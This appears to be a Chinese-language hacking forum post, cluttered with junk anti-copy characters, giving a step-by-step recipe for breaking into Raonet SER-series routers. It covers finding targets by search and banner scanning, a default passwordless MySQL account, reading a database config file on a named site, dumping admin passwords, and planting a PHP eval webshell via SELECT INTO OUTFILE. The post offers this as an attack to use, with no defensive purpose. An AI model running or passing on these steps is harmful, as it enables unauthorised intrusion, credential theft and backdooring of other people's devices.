寻找存在漏洞的路由器方法:
. g1 q# X4 Y1 w6 L. G& S4 p2 r# `) q. Q+ K( ^/ y
1:google搜索'Raonet Subscriber Ethernet Router'
+ f5 a6 T$ G! }6 U1 z; z |7 G d7 e0 I
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20019 p) n/ l* w1 J% |9 P( }6 G
1 w2 s* E$ \; i9 _
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。& U8 j/ }( L/ @% \' t, y
+ h+ ]2 x0 P% N
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......* w8 Q9 P# ^$ d1 Q z% U) e7 d) ~
/ M6 l* _! w* r* Y0 X 4 w" i. P0 j# ]
6 J$ i* X# B7 s: d' j
入侵步骤:
% ~5 K/ A }, h0 ^! a
) V4 @0 A9 L2 f6 ?# S& }* v$ Y1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
! E7 |& E$ y( w* g3 F4 i4 E8 s- D/ ]% k2 p' a
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc1 s0 L' k% @' b. z4 X( R6 e6 ^
3:得到密码后连接,查看GUI管理密码:
6 y8 q) d2 ], M) j/ l' ^use ser_500
8 g# B8 [' l" f' z, Z% v8 Lselect id,passwd from user;% {/ O8 M$ C9 K" D7 w6 o# q
4:通过数据库写入webshell,执行命令:
4 c. d: k& u/ J' muse mysql;& e5 ^; H! P+ ?
create table ok(cmd TEXT);. k3 M% q* Z9 K {8 i, d
insert into ok values("<?php @eval($_POST[cmd])?>");6 [8 _2 f3 b* g: D
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";8 M1 P2 U+ G/ W0 O/ n: O, P8 ?
drop table ok;
* E1 `2 B6 G% _" m) @5 m
2 p. [, D5 t0 W6 L9 n5:连接后门shell.php & Y$ J2 l# E/ R- T( T& A Q
" W$ B2 W U Z/ e3 I6. 搞定!, L* b6 ^+ F2 |5 F6 q/ P
! ]) @; Q& ]" K- j X4 S |